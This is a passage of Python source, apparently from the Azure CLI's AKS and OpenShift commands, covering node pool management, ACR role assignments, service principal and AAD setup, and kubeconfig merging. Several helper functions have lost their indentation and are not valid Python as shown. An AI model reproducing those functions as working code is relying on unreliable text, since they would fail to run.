    deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
    # publish the Container Insights solution to the Log Analytics workspace
    return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
                              validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
                    client_id,
                    acr_name_or_id,
                    subscription_id,
                    detach=False):
    """Grant (or, when detach=True, revoke) the cluster identity's pull access
    on an Azure Container Registry given by name or full resource ID.

    :raises CLIError: when the registry cannot be resolved.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id
    if is_valid_resource_id(acr_name_or_id):
        # Resolve the registry directly from its resource ID.
        try:
            parts = parse_resource_id(acr_name_or_id)
            acr_client = cf_container_registry_service(
                cli_ctx, subscription_id=parts['subscription'])
            registry = acr_client.registries.get(
                parts['resource_group'], parts['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
    else:
        # Fall back to a subscription-wide lookup by registry name.
        try:
            registry = get_resource_by_name(
                cli_ctx, acr_name_or_id, 'Microsoft.ContainerRegistry/registries')
        except CloudError as ex:
            if 'was not found' in ex.message:
                raise CLIError(
                    "ACR {} not found. Have you provided the right ACR name?".format(acr_name_or_id))
            raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Fetch a single agent (node) pool of a managed cluster."""
    return client.get(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
    """List all agent (node) pools of a managed cluster."""
    pools = client.list(resource_group_name, cluster_name)
    return pools
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
                      kubernetes_version=None,
                      zones=None,
                      enable_node_public_ip=False,
                      node_public_ip_prefix_id=None,
                      node_vm_size=None,
                      node_osdisk_type=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      ppg=None,
                      max_pods=0,
                      os_type="Linux",
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      tags=None,
                      labels=None,
                      max_surge=None,
                      mode="User",
                      enable_encryption_at_host=False,
                      enable_ultra_ssd=False,
                      no_wait=False):
    """Add a new agent (node) pool to an existing managed cluster.

    Builds an AgentPool model from the CLI arguments (spot settings, taints,
    autoscaler bounds, OS disk options) and submits a create-or-update to the
    agent pools API.

    :raises CLIError: when a pool with the same name already exists, or when
        autoscaler count validation fails.
    """
    AgentPool = cmd.get_models('AgentPool',
                               resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                               operation_group='agent_pools')
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='agent_pools')
    # Reject duplicate pool names up front with a friendlier message than the RP's.
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
    upgradeSettings = AgentPoolUpgradeSettings()
    taints_array = []
    if node_taints is not None:
        # Taints arrive as a single comma-separated string.
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            except ValueError:
                # NOTE(review): str.strip() cannot raise ValueError, so this
                # handler looks unreachable; taint format appears to be
                # validated server-side. Confirm before relying on this error.
                raise CLIError(
                    'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
    if node_vm_size is None:
        # Default VM size depends on the pool OS.
        if os_type.lower() == "windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"
    if max_surge:
        upgradeSettings.max_surge = max_surge
    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        vnet_subnet_id=vnet_subnet_id,
        proximity_placement_group_id=ppg,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,
        orchestrator_version=kubernetes_version,
        availability_zones=zones,
        scale_set_priority=priority,
        enable_node_public_ip=enable_node_public_ip,
        node_public_ip_prefix_id=node_public_ip_prefix_id,
        node_taints=taints_array,
        upgrade_settings=upgradeSettings,
        enable_encryption_at_host=enable_encryption_at_host,
        enable_ultra_ssd=enable_ultra_ssd,
        mode=mode
    )
    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        if isnan(spot_max_price):
            # The NaN default is a sentinel; -1 tells the service to cap at
            # the current on-demand price.
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price
    # Validates min/max/node counts and applies autoscaler settings in place.
    _check_cluster_autoscaler_flag(
        enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)
    if node_osdisk_type:
        agent_pool.os_disk_type = node_osdisk_type
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        agent_pool,
    )
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Manually scale a node pool to the requested node count.

    :raises CLIError: if the pool has the cluster autoscaler enabled, or the
        requested count equals the current count.
    """
    pool = client.get(resource_group_name, cluster_name, nodepool_name)
    target_count = int(node_count)
    if pool.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if target_count == pool.count:
        raise CLIError(
            "The new node count is the same as the current node count.")
    pool.count = target_count  # pylint: disable=no-member
    return sdk_no_wait(no_wait, client.begin_create_or_update,
                       resource_group_name, cluster_name, nodepool_name, pool)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
                          nodepool_name,
                          kubernetes_version='',
                          node_image_only=False,
                          max_surge=None,
                          no_wait=False):
    """Upgrade a node pool's Kubernetes version, or only its node image when
    node_image_only is set.

    :raises CLIError: when both a Kubernetes version and --node-image-only
        are supplied (the former already implies the latter).
    """
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
    if node_image_only and kubernetes_version != '':
        raise CLIError(
            'Conflicting flags. Upgrading the Kubernetes version will also '
            'upgrade node image version. If you only want to upgrade the '
            'node version please use the "--node-image-only" option only.'
        )
    if node_image_only:
        # Only refresh the node image; the orchestrator version is untouched.
        return _upgrade_single_nodepool_image_version(
            no_wait, client, resource_group_name, cluster_name, nodepool_name)
    pool = client.get(resource_group_name, cluster_name, nodepool_name)
    pool.orchestrator_version = kubernetes_version
    if not pool.upgrade_settings:
        pool.upgrade_settings = AgentPoolUpgradeSettings()
    if max_surge:
        pool.upgrade_settings.max_surge = max_surge
    return sdk_no_wait(no_wait, client.begin_create_or_update,
                       resource_group_name, cluster_name, nodepool_name, pool)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
                         enable_cluster_autoscaler=False,
                         disable_cluster_autoscaler=False,
                         update_cluster_autoscaler=False,
                         min_count=None, max_count=None,
                         tags=None,
                         max_surge=None,
                         mode=None,
                         no_wait=False):
    """Update a node pool's autoscaler settings, tags, mode, or max surge.

    Exactly one of the three autoscaler flags may be set; when none is set,
    at least one of tags/mode/max-surge must be supplied.

    :raises CLIError: on conflicting or missing flags, on invalid min/max
        counts, or when enabling an autoscaler that is not currently enabled
        via the wrong flag (and vice versa, which only warns).
    """
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='agent_pools')
    # Booleans sum to the number of autoscaler flags the caller set.
    update_autoscaler = enable_cluster_autoscaler + \
        disable_cluster_autoscaler + update_cluster_autoscaler
    if update_autoscaler > 1:
        raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler"')
    if (update_autoscaler == 0 and not tags and not mode and not max_surge):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--tags" or "--mode" or "--max-surge"')
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    # min/max are required (and range-checked) only for enable/update.
    _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
                                       update_cluster_autoscaler)
    if enable_cluster_autoscaler:
        if instance.enable_auto_scaling:
            # Already on: warn and bail out without touching the pool.
            logger.warning('Autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks nodepool update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
        instance.enable_auto_scaling = True
    if update_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()
    if max_surge:
        instance.upgrade_settings.max_surge = max_surge
    if disable_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            # Already off: warn and bail out without touching the pool.
            logger.warning(
                'Autoscaler is already disabled for this node pool.')
            return None
        instance.enable_auto_scaling = False
        instance.min_count = None
        instance.max_count = None
    instance.tags = tags
    if mode is not None:
        instance.mode = mode
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        instance,
    )
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
                         nodepool_name,
                         no_wait=False):
    """Delete a node pool from a managed cluster.

    :raises CLIError: when no pool with the given name (case-insensitive)
        exists on the cluster.
    """
    wanted = nodepool_name.lower()
    pools = client.list(resource_group_name, cluster_name)
    if not any(pool.name.lower() == wanted for pool in pools):
        raise CLIError("Node pool {} doesnt exist, "
                       "use 'aks nodepool list' to get current node pool list".format(nodepool_name))
    return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Return the upgrade profile (available versions) for a node pool."""
    profile = client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
    return profile
def _ensure_aks_acr_role_assignment(cli_ctx,
                                    client_id,
                                    registry_id,
                                    detach=False):
    """Create — or delete, when detach=True — the 'acrpull' role assignment
    for client_id scoped to the given container registry.

    :raises CLIError: when the role assignment cannot be created/deleted
        (typically insufficient permissions).
    """
    if detach:
        removed = _delete_role_assignments(cli_ctx,
                                           'acrpull',
                                           client_id,
                                           scope=registry_id)
        if not removed:
            raise CLIError('Could not delete role assignments for ACR. '
                           'Are you an Owner on this subscription?')
        return
    created = _add_role_assignment(cli_ctx,
                                   'acrpull',
                                   client_id,
                                   scope=registry_id)
    if not created:
        raise CLIError('Could not create a role assignment for ACR. '
                       'Are you an Owner on this subscription?')
def _ensure_aks_service_principal(cli_ctx,
                                  service_principal=None,
                                  client_secret=None,
                                  subscription_id=None,
                                  dns_name_prefix=None,
                                  fqdn_subdomain=None,
                                  location=None,
                                  name=None):
    """Return a dict with 'service_principal', 'client_secret' and
    'aad_session_key', creating a new service principal when none was given.

    :raises CLIError: when SP creation fails, or when --service-principal is
        supplied without --client-secret.
    """
    aad_session_key = None
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if service_principal:
        # --service-principal specified, validate --client-secret was too
        if not client_secret:
            raise CLIError(
                '--client-secret is required if --service-principal is specified')
    else:
        # --service-principal not specified, make one.
        client_secret = client_secret or _create_client_secret()
        # Random salt keeps the identifier URL unique per invocation.
        salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
        subdomain = dns_name_prefix if dns_name_prefix else fqdn_subdomain
        url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
            salt, subdomain, location)
        service_principal, aad_session_key = _build_service_principal(
            rbac_client, cli_ctx, name, url, client_secret)
        if not service_principal:
            raise CLIError('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
        logger.info('Created a service principal: %s', service_principal)
        # We don't need to add role assignment for this created SPN
    return {
        'client_secret': client_secret,
        'service_principal': service_principal,
        'aad_session_key': aad_session_key,
    }
def _ensure_osa_aad(cmd,
                    cli_ctx,
                    aad_client_app_id=None,
                    aad_client_app_secret=None,
                    aad_tenant_id=None,
                    identifier=None,
                    name=None, create=False,
                    customer_admin_group_id=None):
    """Build the AAD identity-provider profile for an OpenShift managed
    cluster, optionally creating or updating the backing AAD application.

    When ``create`` is True, an AAD application named after the cluster is
    created (or, if one with the same identifier URI exists, updated with the
    cluster's real callback URL). The tenant ID defaults to the one from the
    current login.

    :return: an OpenShiftManagedClusterAADIdentityProvider model.
    """
    OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
                                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                                operation_group='open_shift_managed_clusters')
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if create:
        # This reply_url is temporary set since Azure need one to create the AAD.
        app_id_name = 'https://{}'.format(name)
        if not aad_client_app_secret:
            aad_client_app_secret = _create_client_secret()
        # Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
        resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
                                         additional_properties=None, type="Scope")
        # Read directory permissions on Windows Azure Active Directory API
        directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
                                          additional_properties=None, type="Role")
        # resource_app_id below is the well-known AAD Graph application ID.
        required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
                                                         additional_properties=None,
                                                         resource_app_id="00000002-0000-0000-c000-000000000000")
        # Look for an existing application registered under the same identifier URI.
        list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
                                                               .format(app_id_name)))
        if list_aad_filtered:
            aad_client_app_id = list_aad_filtered[0].app_id
            # Updating reply_url with the correct FQDN information returned by the RP
            reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
                identifier)
            update_application(client=rbac_client.applications,
                               object_id=list_aad_filtered[0].object_id,
                               display_name=name,
                               identifier_uris=[app_id_name],
                               reply_urls=[reply_url],
                               homepage=app_id_name,
                               password=aad_client_app_secret,
                               required_resource_accesses=[required_osa_aad_access])
            logger.info('Updated AAD: %s', aad_client_app_id)
        else:
            result, _aad_session_key = create_application(client=rbac_client.applications,
                                                          display_name=name,
                                                          identifier_uris=[
                                                              app_id_name],
                                                          homepage=app_id_name,
                                                          password=aad_client_app_secret,
                                                          required_resource_accesses=[required_osa_aad_access])
            aad_client_app_id = result.app_id
            logger.info('Created an AAD: %s', aad_client_app_id)
        # Get the TenantID
        if aad_tenant_id is None:
            profile = Profile(cli_ctx=cli_ctx)
            _, _, aad_tenant_id = profile.get_login_credentials()
    return OpenShiftManagedClusterAADIdentityProvider(
        client_id=aad_client_app_id,
        secret=aad_client_app_secret,
        tenant_id=aad_tenant_id,
        kind='AADIdentityProvider',
        customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
                              service_principal=None,
                              client_secret=None,
                              subscription_id=None,
                              dns_name_prefix=None,
                              location=None,
                              name=None):
    """Return a dict with 'service_principal' and 'client_secret', creating a
    new service principal (with a Contributor role assignment) when none was
    given.

    :raises CLIError: when SP creation fails, or when --service-principal is
        supplied without --client-secret.
    """
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if service_principal:
        # --service-principal specified, validate --client-secret was too
        if not client_secret:
            raise CLIError(
                '--client-secret is required if --service-principal is specified')
    else:
        # --service-principal not specified, make one.
        client_secret = client_secret or _create_client_secret()
        # Random salt keeps the identifier URL unique per invocation.
        salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
        url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
            salt, dns_name_prefix, location)
        service_principal, _aad_session_key = _build_service_principal(
            rbac_client, cli_ctx, name, url, client_secret)
        if not service_principal:
            raise CLIError('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
        logger.info('Created a service principal: %s', service_principal)
        # add role first before save it
        if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
            logger.warning('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
    return {
        'client_secret': client_secret,
        'service_principal': service_principal,
    }
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
    """Return the location of a resource group.

    The GET also doubles as an existence check: it errors out if the group
    does not exist.
    """
    groups = cf_resource_groups(ctx, subscription_id=subscription_id)
    return groups.get(resource_group_name).location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
    """Merge an unencrypted kubeconfig into the file at the specified path, or print it to
    stdout if the path is "-".

    Creates the target file (mode 0600) and any missing parent directories
    before merging. The incoming kubeconfig is written to a temporary file
    which is always removed afterwards.
    """
    # Special case for printing to stdout
    if path == "-":
        print(kubeconfig)
        return
    # ensure that at least an empty ~/.kube/config exists
    directory = os.path.dirname(path)
    if directory and not os.path.exists(directory):
        try:
            os.makedirs(directory)
        except OSError as ex:
            # A concurrent creator is fine; anything else is a real error.
            if ex.errno != errno.EEXIST:
                raise
    if not os.path.exists(path):
        # Create the config file with owner-only permissions (0600).
        with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
            pass
    # merge the new kubeconfig into the existing one
    fd, temp_path = tempfile.mkstemp()
    # additional_file wraps the same fd that backs temp_path, so the write
    # below lands in the file that merge_kubernetes_configurations reads.
    additional_file = os.fdopen(fd, 'w+t')
    try:
        additional_file.write(kubeconfig)
        additional_file.flush()
        merge_kubernetes_configurations(
            path, temp_path, overwrite_existing, context_name)
    except yaml.YAMLError as ex:
        logger.warning(
            'Failed to merge credentials to kube config file: %s', ex)
    finally:
        additional_file.close()
        os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
    """List OpenShift managed clusters, scoped to a resource group when one
    is given, with often-null fields stripped from the output."""
    clusters = (client.list_by_resource_group(resource_group_name)
                if resource_group_name else client.list())
    return _remove_osa_nulls(list(clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name,  # pylint: disable=too-many-locals
                     location=None,
                     compute_vm_size="Standard_D4s_v3",
                     compute_count=3,
                     aad_client_app_id=None,
                     aad_client_app_secret=None,
                     aad_tenant_id=None,
                     vnet_prefix="10.0.0.0/8",
                     subnet_prefix="10.0.0.0/24",
                     vnet_peer=None,
                     tags=None,
                     no_wait=False,
                     workspace_id=None,
                     customer_admin_group_id=None):
    """
    Create an OpenShift (ARO 3.11) managed cluster.

    Builds the compute/infra/master agent pool profiles, wires up an Azure AD
    identity provider (creating AAD applications when none are supplied),
    optional VNet peering and optional Log Analytics monitoring, then submits
    the cluster to the resource provider.

    :param location: Azure region; defaults to the resource group's location.
    :param compute_vm_size: VM size for the 'compute' agent pool.
    :param compute_count: node count for the 'compute' agent pool.
    :param vnet_peer: VNet name or full resource id to peer the cluster VNet with.
    :param workspace_id: Log Analytics workspace resource id; enables monitoring when set.
    :param no_wait: do not block on the long-running create operation.
    """
    # Resolve the SDK model classes through the command loader so the models
    # match the negotiated API version for open_shift_managed_clusters.
    OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
                                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                             operation_group='open_shift_managed_clusters')
    OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
                                                   resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                   operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
                                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                             operation_group='open_shift_managed_clusters')
    OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                             operation_group='open_shift_managed_clusters')
    OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
                                            resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                            operation_group='open_shift_managed_clusters')
    NetworkProfile = cmd.get_models('NetworkProfile',
                                    resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                    operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
                                                        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                        operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    if location is None:
        location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    agent_pool_profiles = []
    agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='compute',  # Must be 12 chars or less before ACS RP adds to it
        count=int(compute_count),
        vm_size=compute_vm_size,
        os_type="Linux",
        role=OpenShiftAgentPoolProfileRole.compute,
        subnet_cidr=subnet_prefix
    )
    # The infra pool is fixed at 3 nodes of Standard_D4s_v3; only the compute
    # pool is user-configurable.
    agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='infra',  # Must be 12 chars or less before ACS RP adds to it
        count=int(3),
        vm_size="Standard_D4s_v3",
        os_type="Linux",
        role=OpenShiftAgentPoolProfileRole.infra,
        subnet_cidr=subnet_prefix
    )
    agent_pool_profiles.append(agent_node_pool_profile)
    agent_pool_profiles.append(agent_infra_pool_profile)
    # The master pool is passed separately (master_pool_profile) and carries no role.
    agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='master',  # Must be 12 chars or less before ACS RP adds to it
        count=int(3),
        vm_size="Standard_D4s_v3",
        os_type="Linux",
        subnet_cidr=subnet_prefix
    )
    identity_providers = []
    create_aad = False
    # Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
    try:
        client.get(resource_group_name, name)
    except CloudError:
        # Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
        if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
            create_aad = True
    osa_aad_identity = _ensure_osa_aad(cmd,
                                       cmd.cli_ctx,
                                       aad_client_app_id=aad_client_app_id,
                                       aad_client_app_secret=aad_client_app_secret,
                                       aad_tenant_id=aad_tenant_id, identifier=None,
                                       name=name, create=create_aad,
                                       customer_admin_group_id=customer_admin_group_id)
    identity_providers.append(
        OpenShiftManagedClusterIdentityProvider(
            name='Azure AD',
            provider=osa_aad_identity
        )
    )
    auth_profile = OpenShiftManagedClusterAuthProfile(
        identity_providers=identity_providers)
    default_router_profile = OpenShiftRouterProfile(name='default')
    if vnet_peer is not None:
        from msrestazure.tools import is_valid_resource_id, resource_id
        # Accept either a bare VNet name (expanded to a full resource id in the
        # cluster's resource group) or an already fully-qualified resource id.
        if not is_valid_resource_id(vnet_peer):
            # NOTE(review): the ARM resource type is usually 'virtualNetworks'
            # (plural) — confirm this builds a valid resource id.
            vnet_peer = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace='Microsoft.Network', type='virtualNetwork',
                name=vnet_peer
            )
    if workspace_id is not None:
        workspace_id = _format_workspace_id(workspace_id)
        monitor_profile = OpenShiftManagedClusterMonitorProfile(
            enabled=True, workspace_resource_id=workspace_id)  # pylint: disable=line-too-long
    else:
        monitor_profile = None
    network_profile = NetworkProfile(
        vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
    osamc = OpenShiftManagedCluster(
        location=location, tags=tags,
        open_shift_version="v3.11",
        network_profile=network_profile,
        auth_profile=auth_profile,
        agent_pool_profiles=agent_pool_profiles,
        master_pool_profile=agent_master_pool_profile,
        router_profiles=[default_router_profile],
        monitor_profile=monitor_profile)
    try:
        # long_running_operation_timeout=300
        # NOTE(review): LongRunningOperation below waits on the poller even when
        # no_wait=True, so the sdk_no_wait call appears to be ineffective here —
        # confirm intended no_wait semantics.
        result = sdk_no_wait(no_wait, client.begin_create_or_update,
                             resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
        result = LongRunningOperation(cmd.cli_ctx)(result)
        instance = client.get(resource_group_name, name)
        # Re-run the AAD setup now that the cluster exists, using its public
        # hostname as the identifier (e.g. for reply URLs).
        _ensure_osa_aad(cmd,
                        cmd.cli_ctx,
                        aad_client_app_id=osa_aad_identity.client_id,
                        aad_client_app_secret=osa_aad_identity.secret,
                        aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
                        name=name, create=create_aad)
    except CloudError as ex:
        # Translate the two "provider not registered / not whitelisted" errors
        # into an actionable CLI message; re-raise everything else.
        if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
            raise CLIError(
                'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed')  # pylint: disable=line-too-long
        if "No registered resource provider found for location" in ex.message:
            raise CLIError(
                'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed')  # pylint: disable=line-too-long
        raise ex
def openshift_show(cmd, client, resource_group_name, name):
    """Fetch a single OpenShift managed cluster and strip its noisy null fields."""
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    managed_cluster = client.get(resource_group_name, name)
    return _remove_osa_nulls([managed_cluster])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
    """
